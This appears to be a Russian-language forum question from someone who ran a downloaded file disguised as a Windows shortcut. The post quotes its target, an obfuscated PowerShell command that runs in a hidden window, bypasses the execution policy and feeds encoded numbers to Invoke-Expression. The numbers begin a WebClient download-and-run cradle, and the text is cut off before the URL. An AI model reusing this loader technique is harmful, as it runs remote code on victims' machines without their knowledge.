Я только что скачал файл, который был скрыт как ярлык для powershell.Я не уверен, какой код он только что выполнил, поскольку он выглядит загадочным.Это то, для чего был настроен целевой файл .lnk:
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NoPr -WINd 1 -eXEc ByP & ( $PsHoME[21]+$PShOmE[34]+'X') (( '73-69%88-40j78P101P119z45U79-98U106%101-99s116r32-83P121P115j116x101x109r46x78U101-116z46j87z101x98x67j108U105-101P110j116D41x46r68U111s119
Он был установлен для запуска в:
%SYSTEMROOT%\System32\WindowsPowerShell\v1.0